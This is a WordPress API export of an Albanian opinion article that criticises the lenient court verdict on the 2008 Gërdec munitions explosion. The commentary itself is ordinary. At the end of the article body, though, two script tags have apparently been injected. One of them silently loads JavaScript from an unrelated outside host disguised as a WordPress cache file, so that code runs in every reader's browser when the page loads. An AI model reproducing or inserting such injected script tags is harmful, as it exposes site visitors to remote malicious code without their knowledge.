{"id":536,"date":"2012-02-19T16:10:38","date_gmt":"2012-02-19T14:10:38","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=536"},"modified":"2013-10-02T16:13:41","modified_gmt":"2013-10-02T14:13:41","slug":"nga-dritarja-e-vogel-e-nje-vendimi-te-madh","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=536","title":{"rendered":"Nga dritarja e vog\u00ebl e nj\u00eb vendimi t\u00eb madh"},"content":{"rendered":"<p>Gjyqtar\u00ebt Hado, Hajdari e Demiraj m\u00eb n\u00eb fund shpall\u00ebn shkurtimisht kush u d\u00ebnua dhe sa u d\u00ebnua p\u00ebr shp\u00ebrthimin e G\u00ebrdecit m\u00eb 15 mars 2008. Para nj\u00eb publiku t\u00eb lodhur nga pritja dhe gati gati t\u00eb bezdisur nga emri G\u00ebrdec, gjyqtar\u00ebt i pren\u00eb fjalit\u00eb e shkurtra p\u00ebrmes nj\u00eb solemniteti t\u00eb sforcuar. Ndon\u00ebse mori gjith\u00eb koh\u00ebn e nevojshme, gjykata nuk publikoi asnj\u00eb arsye dhe argumentim p\u00ebr vendimin. K\u00ebshtu n\u00eb k\u00ebt\u00eb 10 dit\u00ebsh reflektimi, pal\u00ebt e paqarta do t\u00eb enden qorrazi n\u00ebp\u00ebr sportele gjykatash p\u00ebr t\u00eb b\u00ebr\u00eb ankesa formale dhe pa sens kund\u00ebr nj\u00eb arsyetimi q\u00eb askush nuk di se kur do publikohet. Ndon\u00ebse gjykata mori koh\u00ebn m\u00eb komode t\u00eb mundshme duke tjerr\u00eb procesin p\u00ebr mbi 1000 dit\u00eb dhe ndon\u00ebse gjykat\u00ebsit nuk kishin asnj\u00eb gjyq tjet\u00ebr n\u00eb planin ditor t\u00eb pun\u00ebs, p\u00ebrs\u00ebri ata nuk e gjet\u00ebn dot koh\u00ebn q\u00eb t\u2019i japin publikut vendimin e plot\u00eb. Pa u zbardhur vendimi \u00ebsht\u00eb e v\u00ebshtir\u00eb t\u00eb b\u00ebsh nj\u00eb analiz\u00eb t\u00eb pjekur, por edhe me kaq sa lexoi gjyqtari n\u00eb sall\u00eb, na \u00ebsht\u00eb dh\u00ebn\u00eb mund\u00ebsia t\u00eb kuptojm\u00eb mjaftuesh\u00ebm p\u00ebr t\u00eb b\u00ebr\u00eb nj\u00eb analiz\u00eb paraprake. \u00cbsht\u00eb nj\u00eblloj sikur t\u00eb jet\u00eb hapur nj\u00eb dritare e vog\u00ebl dhe ne mund t\u00eb shohim nga brenda k\u00ebt\u00eb tez\u00eb provimi t\u00eb drejt\u00ebsis\u00eb shqiptare.<\/p>\n<div><\/div>\n<div>Gj\u00ebja e par\u00eb q\u00eb u perceptua nga t\u00eb gjith\u00eb q\u00eb n\u00eb fillim ishte r\u00ebnia e akuz\u00ebs s\u00eb vrasjes n\u00eb rrethana t\u00eb cil\u00ebsuara. K\u00ebshtu, sipas gjykat\u00ebs nuk ka vrasje si\u00e7 pretendonte prokuroria. Sigurisht q\u00eb kjo nuk mohon faktin q\u00eb n\u00eb G\u00ebrdec humb\u00ebn jet\u00ebn 26 persona. Thjesht k\u00ebto humbje jete u riklasifikuan si pasoja an\u00ebsore t\u00eb shkeljes s\u00eb rregullave t\u00eb mbrojtjes n\u00eb pun\u00eb. Njoh\u00ebsit e ligjit e din\u00eb mir\u00eb se gjykat\u00ebs i lejohet t\u00eb b\u00ebj\u00eb nj\u00eb riklasifikim t\u00eb till\u00eb, ndaj deri k\u00ebtu duket si nj\u00eb triblim brenda rregullave t\u00eb loj\u00ebs.<\/div>\n<div><\/div>\n<div>Diferenca kryesore mes klasifikimit t\u00eb b\u00ebr\u00eb nga gjykata n\u00eb krahasim me at\u00eb q\u00eb pretendoi prokuroria \u00ebsht\u00eb m\u00eb shum\u00eb tek masa e d\u00ebnimit. Gjykata ka gjetur nj\u00eb nen m\u00eb t\u00eb but\u00eb duke hedhur iden\u00eb se burgimi i p\u00ebrjetsh\u00ebm b\u00ebhet i pap\u00ebrshtatsh\u00ebm. Por k\u00ebtu nis problemi m\u00eb i madh. Neni 289 i Kodit Penal, n\u00eb paragrafin e dyt\u00eb parashikon nj\u00eb d\u00ebnim jo m\u00eb pak se pes\u00eb vjet. Kjo do t\u00eb thot\u00eb q\u00eb gjykata teorikisht n\u00eb aplikim t\u00eb k\u00ebtij neni mundet edhe t\u00eb arrij\u00eb t\u00eb jap\u00eb d\u00ebnim me burgim t\u00eb p\u00ebrjetsh\u00ebm. K\u00ebt\u00eb mund ta mb\u00ebshtes\u00eb edhe n\u00eb nenin 31 t\u00eb Kodit Penal, i cili lejon dh\u00ebnien e burgimit t\u00eb p\u00ebrjetsh\u00ebm n\u00eb rastet e nj\u00eb krimi t\u00eb r\u00ebnd\u00eb. Gjykat\u00ebs n\u00eb rastin konkret krimi i G\u00ebrdecit iu duk i nivelit mesatar, as i leht\u00eb e as i r\u00ebnd\u00eb. Kjo \u00ebsht\u00eb dhe pjesa q\u00eb gjykat\u00ebsit zakonisht tentojn\u00eb t\u00eb justifikojn\u00eb m\u00eb pak n\u00eb dh\u00ebnien e vendimit, por, me apo pa justifikimin e gjyqtar\u00ebve, mund t\u00eb themi me plot goj\u00eb se vendimi ishte nj\u00eb p\u00ebrk\u00ebdhelje. Miklimi i zem\u00ebrat\u00ebs s\u00eb familjar\u00ebve t\u00eb viktimave me 18 vitet impresionuese t\u00eb d\u00ebnimit p\u00ebr dy t\u00eb pandehur ishte nj\u00eb tentativ\u00eb e d\u00ebshtuar. Shifrat 18 apo 10 jan\u00eb shum\u00eb joproporcionale me ngjarjen. \u00a0Le t\u00eb shohim disa rrethana p\u00ebr ta kuptuar m\u00eb mir\u00eb k\u00ebt\u00eb:<\/div>\n<div><\/div>\n<div>S\u00eb pari, n\u00eb p\u00ebrcaktimin e mas\u00ebs s\u00eb d\u00ebnimit merren parasysh rrethanat r\u00ebnduese. N\u00eb rastin e shp\u00ebrthimit t\u00eb G\u00ebrdecit jan\u00eb plot t\u00eb tilla si p.sh.: krimi \u00ebsht\u00eb kryer n\u00eb bashk\u00ebpunim, \u00ebsht\u00eb kryer me motivin e p\u00ebrfitimit ekonomik, \u00ebsht\u00eb kryer duke p\u00ebrdorur l\u00ebnd\u00eb plas\u00ebse, \u00ebsht\u00eb kryer kund\u00ebr f\u00ebmij\u00ebve e grave, \u00ebsht\u00eb kryer duke shp\u00ebrdoruar funksionet publike, etj. Sikur nj\u00eb nga k\u00ebto rrethana t\u00eb ekzistoj\u00eb gjykata e ngre stek\u00ebn m\u00eb lart. Kur k\u00ebto rrethana jan\u00eb kaq shum\u00eb sa rendita m\u00eb lart, masa e d\u00ebnimit duhej t\u00eb kishte kapur vlera t\u00eb skajshme.<\/div>\n<div><\/div>\n<div>S\u00eb dyti, n\u00eb p\u00ebrcaktimin e mas\u00ebs s\u00eb d\u00ebnimit merret parasysh edhe d\u00ebmi i shkaktuar. Shp\u00ebrthimi i G\u00ebrdecit nuk ishte nj\u00eb plasje e vog\u00ebl ordinere, nga e cila dikush dogji krahun apo dikush theu k\u00ebmb\u00ebn. Nga ky shp\u00ebrthim kataklizmik, u vran\u00eb e u coptuan n\u00eb sekond\u00eb mbi 20 vet\u00eb, gra shtatzana e f\u00ebmij\u00eb foshnje. Edhe ata q\u00eb i mbijetuan sekondit t\u00eb par\u00eb, u p\u00ebrp\u00ebrlit\u00ebn mes dhimbjeve t\u00eb pakurueshme, dhe n\u00eb ndonj\u00eb rast edhe p\u00ebr dit\u00eb e jav\u00eb t\u00eb t\u00ebra para se t\u00eb nd\u00ebrronin jet\u00eb. Shp\u00ebrthimi plagosi me qindra t\u00eb pafajsh\u00ebm, gjymtoi f\u00ebmij\u00eb, nd\u00ebrpreu shtatzani duke kontribuar n\u00eb shtimin e jet\u00ebve t\u00eb humbura apo t\u00eb pafilluara fare. Shp\u00ebrthimi la pa sht\u00ebpi dy fshatra t\u00eb t\u00ebr\u00eb dhe tronditi gjith\u00eb kryeqytetin. Pa dyshim q\u00eb ky d\u00ebm ishte i mjaftuesh\u00ebm q\u00eb gjykata t\u00eb rrihte fort \u00e7eki\u00e7in pasi t\u00eb jepte me bindje t\u00eb patundur d\u00ebnimin me burgim t\u00eb p\u00ebrjetsh\u00ebm p\u00ebr shkaktar\u00ebt.<\/div>\n<div><\/div>\n<div>S\u00eb treti, sikur t\u00eb mos mjaftojn\u00eb k\u00ebto, gjykata edhe n\u00eb vler\u00ebsimin e shkall\u00ebs s\u00eb fajit do t\u00eb dilte n\u00eb konkluzionin q\u00eb burgimi i p\u00ebrjetsh\u00ebm do t\u00eb ishte i pashmangsh\u00ebm. N\u00eb G\u00ebrdec nuk \u00ebsht\u00eb se u zbatuan 99 rregulla n\u00eb m\u00ebnyr\u00ebn m\u00eb rigoroze t\u00eb mundshme dhe humbja e p\u00ebrkohshme e v\u00ebmendjes ndaj rregullit 100 shkaktoi tragjedin\u00eb. \u00a0P\u00ebrkundrazi, n\u00eb G\u00ebrdec nuk u zbatua asnj\u00eb rregull. Gjat\u00eb leximit t\u00eb raportit t\u00eb ekspert\u00ebve ushtarak\u00eb ishte nj\u00eb mundim i madh t\u00eb q\u00ebndroje pa v\u00ebn\u00eb duart n\u00eb kok\u00eb n\u00eb \u00e7do paragraf. Asnj\u00eb mas\u00eb mbrojt\u00ebse, asnj\u00eb kontroll, asnj\u00eb veg\u00ebl e specializuar. E gjith\u00eb kjo ndodhi p\u00ebr t\u00eb kursyer nj\u00eb grusht para m\u00eb shum\u00eb. N\u00ebse ishte planifikuar t\u00eb fitoheshin 1 milion\u00eb dollar\u00eb, at\u00ebher\u00eb duke mos p\u00ebrdorur mjetet e duhura do t\u00eb mund t\u00eb kurseheshin edhe ca mij\u00ebra dollar\u00eb m\u00eb shum\u00eb. Duke pun\u00ebsuar fshatar\u00eb dhe f\u00ebmij\u00eb t\u00eb mitur e jo specialist\u00eb t\u00eb mir\u00ebfillt\u00eb demontimi, do t\u00eb mund t\u00eb kurseheshin edhe ca paga m\u00eb shum\u00eb. Duke futur n\u00eb pun\u00eb grat\u00eb p\u00ebr t\u00eb b\u00ebr\u00eb transport hekurishtesh, do t\u00eb mund t\u00eb kursehej blerja e nj\u00eb makinerie pirun. Duke shp\u00ebrfillur edhe telat q\u00eb duheshin lidhur p\u00ebr t\u00eb shkarkuar elektricitetin statik t\u00eb tavolinave, u kursyen edhe ca qindarka. Madje aq e r\u00ebnd\u00eb ishte gjendja sa q\u00eb t\u00eb ndjerit Qemal Deliu iu desh t\u00eb saldonte vet\u00eb karroc\u00ebn e tij sepse pronar\u00ebt nuk shpenzonin as p\u00ebr karroc\u00eb e as p\u00ebr saldim. Kjo qasje ndaj rregullave dhe motivi t\u00ebr\u00ebsisht i p\u00ebrfitimit ekonomik i nivelit makut, ishte tregues i nj\u00eb shkall\u00eb t\u00eb lart\u00eb faji, q\u00eb gjykata duhej ta kishte vler\u00ebsuar drejt n\u00eb momentin e p\u00ebrcaktimit t\u00eb ashp\u00ebrsis\u00eb s\u00eb vendimit.<\/div>\n<div><\/div>\n<div>Por vendimi ishte i but\u00eb dhe gati gati i pambukt\u00eb. Ndryshe nga krimet ordinere t\u00eb vjedhjes s\u00eb bicikletave ku gjyqtar\u00ebt jan\u00eb t\u00eb ashp\u00ebr, n\u00eb rastin e krimit t\u00eb G\u00ebrdecit gjykata u tregua e m\u00ebshirshme dhe e moderuar, me nj\u00eb muzikalitet gati n\u00eb mi minor\u2026<\/div>\n<div><\/div>\n<div>\u2026Gjykata aplikoi paragrafin e fundit t\u00eb nenit 55, nj\u00eblloj sikur t\u00eb kishte t\u00eb b\u00ebnte me ndonj\u00eb vjedhje ushqimesh me q\u00ebllim ushqyerjen e f\u00ebmij\u00ebve t\u00eb mitur nga nj\u00eb prind i papun\u00eb. Ky paragraf lejon gjykat\u00ebn q\u00eb t\u00eb ver\u00eb dor\u00ebn n\u00eb zem\u00ebr dhe me humaniz\u00ebm t\u00eb b\u00ebj\u00eb nj\u00eb skonto t\u00eb madhe p\u00ebr ndonj\u00eb burr\u00eb t\u00eb mir\u00eb q\u00eb halli e ka katandisur t\u00eb b\u00ebj\u00eb kriminelin. Ky paragraf aplikohet vet\u00ebm kur personat nuk paraqesin rrezikshm\u00ebri shoq\u00ebrore. K\u00ebshtu, p.sh. t\u00eb pandehurit Y. Pinari iu mblodh\u00ebn vitet e burgut duke i skontuar aty p\u00ebr aty 10 vjet burgim. E nj\u00ebjta gj\u00eb ndodhi pothuaj p\u00ebr t\u00eb gjith\u00eb. Sipas gjykat\u00ebs, ata t\u00eb gjith\u00eb jan\u00eb persona t\u00eb parreziksh\u00ebm dhe burra t\u00eb mir\u00eb, megjith\u00ebse personalisht nuk arrij dot t\u00eb p\u00ebrfytyroj ask\u00ebnd q\u00eb njoh q\u00eb t\u00eb ndodh\u00eb t\u00eb pun\u00ebsoj\u00eb f\u00ebmij\u00eb t\u00eb mitur p\u00ebr t\u00eb demontuar predha 152 mm me rrezikun q\u00eb t\u2019i plas\u00eb n\u00eb fytyr\u00eb. Ndoshta kjo sjellje nuk e b\u00ebn njeriun aspak t\u00eb rreziksh\u00ebm sipas bot\u00ebkuptimit t\u00eb gjyqtar\u00ebve. Ndoshta gjyqtar\u00ebt kan\u00eb qen\u00eb aq shum\u00eb t\u00eb z\u00ebn\u00eb me studimin e k\u00ebsaj dosjeje sa q\u00eb jan\u00eb shk\u00ebputur nga realitetit dhe nuk e perceptojn\u00eb at\u00eb si ne t\u00eb tjer\u00ebt.<\/div>\n<div><\/div>\n<div>Nga dritarja e vog\u00ebl, shoh edhe nj\u00eb problem tjet\u00ebr. Shkelja e rregullave t\u00eb mbrojtjes n\u00eb pun\u00eb nuk p\u00ebrthith t\u00eb gjitha vrasjet, si\u00e7 mund t\u00eb mendohet n\u00eb momentin e par\u00eb. Ky nen vlen n\u00eb rastet e humbjes s\u00eb jet\u00ebs t\u00eb punonj\u00ebsve t\u00eb fabrik\u00ebs. Por kush u p\u00ebrgjigj p\u00ebr vrasjet jasht\u00eb fabrik\u00ebs? Ku \u00ebsht\u00eb p\u00ebrgjegj\u00ebsi p\u00ebr vrasjen e atyre f\u00ebmij\u00ebve q\u00eb luanin me bi\u00e7iklet\u00eb n\u00eb oborrin e sht\u00ebpis\u00eb? K\u00ebtu duhet gjetur nj\u00eb nen tjet\u00ebr dhe gjykata duket se e ka vrar\u00eb mendjen edhe p\u00ebr k\u00ebt\u00eb aspekt. Gjyqtar\u00ebt nxorr\u00ebn nga kapelja e magjistarit nenin 282, q\u00eb b\u00ebn fjal\u00eb p\u00ebr shkeljen e rregullave p\u00ebr l\u00ebnd\u00ebt plas\u00ebse. Me k\u00ebt\u00eb nen u d\u00ebnua vet\u00ebm Mihal Delijorgji. Pra sido q\u00eb do ta rrotulloj\u00eb gjykata arsyetimin n\u00eb vendimin e zbardhur, nj\u00eb gj\u00eb \u00ebsht\u00eb e qart\u00eb: Pinari, Ngjeci dhe Minxoli jan\u00eb p\u00ebrgjegj\u00ebs p\u00ebr vrasjet brenda fabrik\u00ebs, nd\u00ebrsa Delijorgji p\u00ebr vrasjet jasht\u00eb fabrik\u00ebs. Por, si ka mund\u00ebsi q\u00eb personi i vet\u00ebm p\u00ebr vrasjet jasht\u00eb fabrik\u00ebs t\u00eb d\u00ebnohet vet\u00ebm me 10 vjet burg? P\u00ebrgjigja \u00ebsht\u00eb tek vet\u00eb neni 282, i cili parashikon nj\u00eb d\u00ebnim maksimal prej 10 vjet\u00ebsh. K\u00ebsisoj gjykat\u00ebs nuk i ka mbetur shum\u00eb zgjedhje dhe ka dh\u00ebn\u00eb maksimumin e d\u00ebnimit. N\u00ebse ndalemi pak k\u00ebtu, v\u00ebm\u00eb re se ndon\u00ebse shkeljet e rregullave jan\u00eb b\u00ebr\u00eb kolektivisht nga t\u00eb gjith\u00eb, d\u00ebnimet jan\u00eb dh\u00ebn\u00eb ose p\u00ebr nj\u00ebr\u00ebn shkelje, ose p\u00ebr tjetr\u00ebn. K\u00ebshtu askush nuk p\u00ebrgjigjet edhe p\u00ebr shkelje t\u00eb rregullave n\u00eb pun\u00eb, edhe p\u00ebr shkelje t\u00eb rregullave me l\u00ebnd\u00ebt plas\u00ebse. N\u00ebse do t\u00eb ndodhte t\u00eb mendohej k\u00ebshtu, gjykat\u00ebs do t\u2019i duhej t\u00eb jepte d\u00ebnime shum\u00eb m\u00eb t\u00eb r\u00ebnda, por p\u00ebr rrethana ende t\u00eb paqarta kjo gj\u00eb nuk ndodhi.<\/div>\n<div><\/div>\n<div>Po ta mendojm\u00eb pak m\u00eb thell\u00eb nj\u00eb gj\u00eb \u00ebsht\u00eb e qart\u00eb, q\u00eb p\u00ebrgjegj\u00ebsia p\u00ebr humbjen e jet\u00ebs ka edhe pasoja n\u00eb padin\u00eb civile q\u00eb kan\u00eb ngritur familjar\u00ebt. K\u00ebshtu familjar\u00ebt e f\u00ebmij\u00ebve t\u00eb vrar\u00eb n\u00eb oborrin e sht\u00ebpis\u00eb do t\u00eb duhet t\u2019i ken\u00eb hesapet vet\u00ebm me Delijorgjin dhe Albdemil sh.p.k., nd\u00ebrkoh\u00eb shteti, Ministria e Mbrojtjes apo MEICO, do t\u00eb tentojn\u00eb t\u00eb dalin me duar t\u00eb lara.<\/div>\n<div><\/div>\n<div>Dritarja e vog\u00ebl ofron edhe nj\u00eb pamje mjaft interesante n\u00eb lidhje me krimin e shp\u00ebrdorimit t\u00eb detyr\u00ebs. P\u00ebr k\u00ebt\u00eb krim, gjykata aplikoi disa skonto, t\u00eb cilat e b\u00ebjn\u00eb d\u00ebnimin p\u00ebr k\u00ebt\u00eb krim t\u00eb pakonsideruesh\u00ebm p\u00ebr t\u00eb d\u00ebnuarit kryesor\u00eb, nd\u00ebrkoh\u00eb q\u00eb p\u00ebr t\u00eb tjer\u00ebt \u00ebsht\u00eb n\u00eb nivel t\u00eb ul\u00ebt. Por ama nj\u00eb gj\u00eb bie n\u00eb sy, q\u00eb Prokuroria e P\u00ebrgjithshme n\u00eb p\u00ebrgjith\u00ebsi nuk paska gabuar n\u00eb faktimin e k\u00ebtij krimi n\u00eb t\u00eb gjitha instancat. Duke u pranuar pa ndryshime akuzat e pretenduara nga prokuror\u00ebt p\u00ebr krimin e shp\u00ebrdorimit t\u00eb detyr\u00ebs, krijohen premisat t\u00eb besohet m\u00eb fort se kurr\u00eb se i nj\u00ebjti fat pret edhe akuz\u00ebn e mbetur pezull ndaj ish Ministrit t\u00eb Mbrojtjes. Gjasat q\u00eb prokuroria t\u00eb ket\u00eb gabuar vet\u00ebm tek dosja e ish Ministrit jan\u00eb t\u00eb vogla. Ky \u00ebsht\u00eb tregues se gjyqi i mbetur pezull ka sot nj\u00eb arsye m\u00eb t\u00eb fort\u00eb p\u00ebr t\u2019u v\u00ebn\u00eb n\u00eb l\u00ebvizje, arsye q\u00eb shihen qart\u00eb nga dritarja e vog\u00ebl e vendimit t\u00eb G\u00ebrdecit.<\/div>\n<div><\/div>\n<div>Megjithat\u00eb vendimi i arsyetuar \u00ebsht\u00eb ende i fshehur atje brenda mendjes s\u00eb gjyqtar\u00ebve. Nd\u00ebrkoh\u00eb q\u00eb dit\u00ebt ikin, t\u00eb d\u00ebnuarit shkarkojn\u00eb nga kalendari dit\u00ebt e burgimit eventual, n\u00eb komoditetin e sht\u00ebpis\u00eb dhe t\u00eb ndonj\u00eb sh\u00ebtitjeje n\u00eb natyr\u00eb sipas rastit. Sigurisht q\u00eb gjykata mund t\u00eb kujdesej dhe p\u00ebr k\u00ebt\u00eb aspekt, por nj\u00eblloj si p\u00ebr uljen e d\u00ebnimit, ashtu duhet t\u00eb ket\u00eb funksionuar e nj\u00ebjta bindje p\u00ebr parrezikshm\u00ebrin\u00eb shoq\u00ebrore t\u00eb t\u00eb pandehurve edhe n\u00eb lidhje me riaktivizimin e masave t\u00eb siguris\u00eb.<\/div>\n<div><\/div>\n<div>Pas nj\u00eb pritjeje 4 vje\u00e7are natyrisht q\u00eb do t\u00eb presim edhe disa dit\u00eb. Fundja zbutja e pafalshme e gjykat\u00ebs para krimit m\u00eb t\u00eb r\u00ebnd\u00eb t\u00eb k\u00ebtyre 20 viteve \u00ebsht\u00eb shum\u00eb m\u00eb e r\u00ebnd\u00eb se kostoja kohore e k\u00ebtij gjyqi tragji-komik. K\u00ebshilli i Lart\u00eb i Drejt\u00ebsis\u00eb do t\u00eb p\u00ebrballet me nj\u00eb mision t\u00eb v\u00ebshtir\u00eb n\u00ebse do t\u2019i duhet t\u00eb justifikoj\u00eb gjyqtar\u00ebt dhe t\u2019u jap\u00eb atyre not\u00ebn kaluese n\u00eb k\u00ebt\u00eb performanc\u00eb kaq mediokre. Drejt\u00ebsia e vonuar \u00ebsht\u00eb drejt\u00ebsi e mohuar, por n\u00ebse drejt\u00ebsia \u00ebsht\u00eb e vonuar dhe mohuese nj\u00ebkoh\u00ebsisht, at\u00ebher\u00eb ajo humbet nocionin e saj njer\u00ebzor t\u00eb ekzistenc\u00ebs.<\/div>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gjyqtar\u00ebt Hado, Hajdari e Demiraj m\u00eb n\u00eb fund shpall\u00ebn shkurtimisht kush u d\u00ebnua dhe sa u d\u00ebnua p\u00ebr shp\u00ebrthimin e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":537,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/536"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=536"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/536\/revisions"}],"predecessor-version":[{"id":538,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/536\/revisions\/538"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/537"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}